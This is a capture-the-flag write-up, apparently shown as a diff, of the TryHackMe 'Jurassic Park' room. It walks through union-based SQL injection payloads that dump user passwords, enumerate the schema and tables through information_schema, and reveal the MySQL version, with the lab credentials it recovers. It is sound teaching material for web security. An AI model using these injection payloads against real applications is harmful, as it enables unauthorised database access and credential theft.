ChrisPritchard/ctf-writeups/tryhackme/jurassicpark.md

 Dennis, why have you blocked these characters: ' # DROP - username @ ---- Is this our WAF now?
 ```

+## SQLi

 Trying the query `1 union select null, password, null, null, null from users` results in the password `ih8dinos` being printed on screen.
 I had confirmed the five column select and positioning already through trial and error.

 Select into outfile didn't work (--secure-file-priv or whatever was not set).
 Select `user()` revealed mysql was running as root@localhost.
 Trying to ssh onto the box with root and `ih8dinos` did not get me access unfortunately.

 I discovered the sql inject would only return the last row from its query as a result.
 Therefore, ih8dinos from above was the password of the final row in the users table.
 Appending `limit 2` got a second and as far as I could see, the only other password: `D0nt3ATM3`.
 This also didn't work with ssh.

+However, focusing on the room questions:

+1. To get the database name, I used: `1 union select distinct null, table_schema, null, null, null from information_schema.tables limit 4` and revealed `park`

+2. I used `1 union select distinct null, table_name, null, null, null from information_schema.tables where table_schema = "park" limit 2` to discover just two tables, `items` and `users`.
+I already know from my injection that items has `5` columns

+3. `1 union select null, version(), null, null, null` reveals `5.7.25-0ubuntu0.16.04.2`.
+Going by the answer mask, the answer is `ubuntu 16.04`

+4. dennis' password could be one of the two I have found so far. `ih8dinos` was the answer.